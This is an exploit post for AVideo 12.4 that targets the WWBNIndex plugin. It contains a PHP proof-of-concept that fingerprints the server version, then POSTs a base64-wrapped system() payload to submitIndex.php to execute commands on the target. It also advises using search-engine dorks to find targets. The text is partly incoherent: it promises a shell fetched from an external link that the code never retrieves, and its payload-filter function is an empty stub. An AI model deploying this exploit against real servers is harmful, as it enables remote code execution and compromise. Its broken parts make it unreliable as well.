=============================================================================================================================================
| # Title     : AVideo 12.4 php code injection Vulnerability                                                                                |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                            |
| # Vendor    : https://github.com/WWBN/AVideo/tree/master                                                                                  |
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following php code Upload shell file from external link.

[+] Line 114 set your target.

[+] Line 115 set your commands.

[+] save code as poc.php .

[+] USage : cmd = php poc.php .

[+] PayLoad :

<?php
class indoushka
{
    private $target_uri;
    private $payload;

    public function __construct($target_uri, $payload)
    {
        $this->target_uri = $target_uri;
        $this->payload = $payload;
    }

    public function exploit()
    {
        // إعداد الحمولة
        $php_code = "<?php " . ($this->isArchPHP() ? $this->payload : "system(base64_decode('" . base64_encode($this->payload) . "'));") . " ?>";
        $filter_payload = $this->generatePhpFilterPayload($php_code);

        // إرسال الطلب
        $data = http_build_query(['systemRootPath' => $filter_payload]);
        $response = $this->sendRequest('POST', '/plugin/WWBNIndex/submitIndex.php', $data);

        if ($response['code'] !== 200) {
            echo "Server returned " . $response['code'] . ". Successful exploit attempts should not return a response.\n";
        }
    }

    public function check()
    {
        $response = $this->sendRequest('GET', '/index.php');
        if (!$response) {
            return 'Failed to connect to the target.';
        }

        if ($response['code'] !== 200) {
            return "Unexpected HTTP response code: " . $response['code'];
        }

        preg_match('/Powered by AVideo ® Platform v([\d.]+)/', $response['body'], $version_match);
        preg_match('/<!--.*?v:([\d.]+).*?-->/m', $response['body'], $version_match);
        if (empty($version_match[1])) {
            return 'Unable to extract AVideo version.';
        }

        $version = $version_match[1];
        $plugin_check = $this->sendRequest('GET', '/plugin/WWBNIndex/submitIndex.php');
        if ($plugin_check['code'] !== 200) {
            return 'Vulnerable plugin WWBNIndex was not detected';
        }

        if (version_compare($version, '12.4') >= 0 && version_compare($version, '14.2') <= 0) {
            return "Detected vulnerable AVideo version: {$version}, with vulnerable plugin WWBNIndex running.";
        }

        return "Detected non-vulnerable AVideo version: {$version}";
    }

    private function sendRequest($method, $uri, $data = null)
    {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $this->target_uri . $uri);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);

        if ($method === 'POST') {
            curl_setopt($ch, CURLOPT_POST, true);
            curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
        }

        $response = curl_exec($ch);
        $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        curl_close($ch);

        return ['code' => $http_code, 'body' => $response];
    }

    private function isArchPHP()
    {
        // افترض أن الحمولة عبارة عن كود PHP
        return true; // أو تحقق من ذلك بناءً على شروط معينة
    }

    private function generatePhpFilterPayload($php_code)
    {
        // يجب أن تضيف هنا منطق إعداد الحمولة (تصفية)
        return $php_code; // قم بتعديل ذلك بناءً على متطلباتك
    }
}

// مثال على كيفية الاستخدام:
$target_uri = "http://target-url.com"; // أدخل عنوان الهدف هنا
$payload = "<?php echo 'Hello World!'; ?>"; // الحمولة المراد استخدامها
$indoushka = new indoushka($target_uri, $payload);
$check_result = $indoushka->check();
echo $check_result . "\n";
$indoushka->exploit();
?>


Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================